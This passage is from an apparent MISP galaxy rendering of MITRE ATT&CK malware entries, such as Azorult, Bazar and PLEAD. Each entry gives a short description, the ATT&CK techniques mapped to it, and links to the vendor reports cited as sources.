uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 5025. Table References
Links
https://attack.mitre.org/software/S0373
https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

BadPatch - S0337

[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)

The tag is: misp-galaxy:mitre-malware="BadPatch - S0337"

BadPatch - S0337 is also known as:

BadPatch

View relationships graph

BadPatch - S0337 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 5026. Table References
Links
https://attack.mitre.org/software/S0337
https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/

FlawedGrace - S0383

[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="FlawedGrace - S0383"

FlawedGrace - S0383 is also known as:

FlawedGrace

View relationships graph

FlawedGrace - S0383 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 5027. Table References
Links
https://attack.mitre.org/software/S0383
https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Micropsia - S0339

[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)

The tag is: misp-galaxy:mitre-malware="Micropsia - S0339"

Micropsia - S0339 is also known as:

Micropsia

View relationships graph

Micropsia - S0339 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 5028. Table References
Links
https://attack.mitre.org/software/S0339
https://blog.talosintelligence.com/2017/06/palestine-delphi.html
https://blog.radware.com/security/2018/07/micropsia-malware/

PowerStallion - S0393

[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)

The tag is: misp-galaxy:mitre-malware="PowerStallion - S0393"

PowerStallion - S0393 is also known as:

PowerStallion

View relationships graph

PowerStallion - S0393 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 5029. Table References
Links
https://attack.mitre.org/software/S0393
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

MESSAGETAP - S0443

[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)

The tag is: misp-galaxy:mitre-malware="MESSAGETAP - S0443"

MESSAGETAP - S0443 is also known as:

MESSAGETAP

View relationships graph

MESSAGETAP - S0443 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 5030. Table References
Links
https://attack.mitre.org/software/S0443
https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html

Azorult - S0344

[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)

The tag is: misp-galaxy:mitre-malware="Azorult - S0344"

Azorult - S0344 is also known as:

Azorult

View relationships graph

Azorult - S0344 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 5031. Table References
Links
https://attack.mitre.org/software/S0344
https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/
https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

PLEAD - S0435

[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)

The tag is: misp-galaxy:mitre-malware="PLEAD - S0435"

PLEAD - S0435 is also known as:

PLEAD

View relationships graph

PLEAD - S0435 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 5032. Table References
Links
https://attack.mitre.org/software/S0435
https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/
https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

Bazar - S0534

[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)

The tag is: misp-galaxy:mitre-malware="Bazar - S0534"

Bazar - S0534 is also known as:

Bazar
KEGTAP
Team9

View relationships graph

Bazar - S0534 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5033. Table References
Links
https://attack.mitre.org/software/S0534
https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

Denis - S0354

[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)

The tag is: misp-galaxy:mitre-malware="Denis - S0354"

Denis - S0354 is also known as:

Denis

View relationships graph

Denis - S0354 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 5034. Table References
Links
https://attack.mitre.org/software/S0354
https://www.cybereason.com/blog/operation-cobalt-kitty-apt

Pony - S0453

[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)

The tag is: misp-galaxy:mitre-malware="Pony - S0453"

Pony - S0453 is also known as:

Pony

View relationships graph

Pony - S0453 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 5035. Table References
Links
https://attack.mitre.org/software/S0453
https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/

Seasalt - S0345

[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="Seasalt - S0345"

Seasalt - S0345 is also known as:

Seasalt

View relationships graph

Seasalt - S0345 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5036. Table References
Links
https://attack.mitre.org/software/S0345
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Spark - S0543

[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020)

The tag is: misp-galaxy:mitre-malware="Spark - S0543"

Spark - S0543 is also known as:

Spark

View relationships graph

Spark - S0543 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5037. Table References
Links
https://attack.mitre.org/software/S0543
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

INSOMNIA - S0463

[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)

The tag is: misp-galaxy:mitre-malware="INSOMNIA - S0463"

INSOMNIA - S0463 is also known as:

INSOMNIA

View relationships graph

INSOMNIA - S0463 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
